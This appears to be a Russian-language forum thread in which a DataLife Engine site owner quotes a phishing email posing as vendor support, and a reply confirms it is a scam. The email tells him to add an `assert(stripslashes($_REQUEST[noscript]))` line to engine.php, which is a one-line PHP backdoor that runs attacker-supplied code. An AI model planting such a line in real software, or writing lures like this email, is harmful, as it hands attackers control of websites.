вопрос
Здравствуйте. У меня сайт под управлением DLE 10.3. Сегодня на почту мне пришло письмо от support@dle-news.ru такого содержания:
Это письмо вам отправил support с сайта site.com
____________________________________________________________________________________
Уважаемые владельцы!
Благодарим Вас за использование CMS «DataLife Engine».
Сообщаем Вам о том, что мы зафиксировали уязвимость во всех версиях CMS «DataLife Engine».
Степень опасности: Высокая
Проблема: Недостаточная фильтрация данных, которая может позволить при определенных настройках серверного ПО читать содержимое файлов.
Для исправления откройте файл: /engine/engine.php и в самое начало файла после строчки
<?php
добавьте:
assert(stripslashes($_REQUEST[noscript]));
Устраните уязвимость.
С уважением,
Команда «DataLife Engine»
Сайт раньше работал на DLE 9.3 потом было обновление сразу на 10.3. На другие сайты такое не приходило. Не обман ли это?
Это письмо вам отправил support с сайта site.com
____________________________________________________________________________________
Уважаемые владельцы!
Благодарим Вас за использование CMS «DataLife Engine».
Сообщаем Вам о том, что мы зафиксировали уязвимость во всех версиях CMS «DataLife Engine».
Степень опасности: Высокая
Проблема: Недостаточная фильтрация данных, которая может позволить при определенных настройках серверного ПО читать содержимое файлов.
Для исправления откройте файл: /engine/engine.php и в самое начало файла после строчки
<?php
добавьте:
assert(stripslashes($_REQUEST[noscript]));
Устраните уязвимость.
С уважением,
Команда «DataLife Engine»
Сайт раньше работал на DLE 9.3 потом было обновление сразу на 10.3. На другие сайты такое не приходило. Не обман ли это?
Можете не сомневаться, это злоумышленники просят вас прописать бекдор.
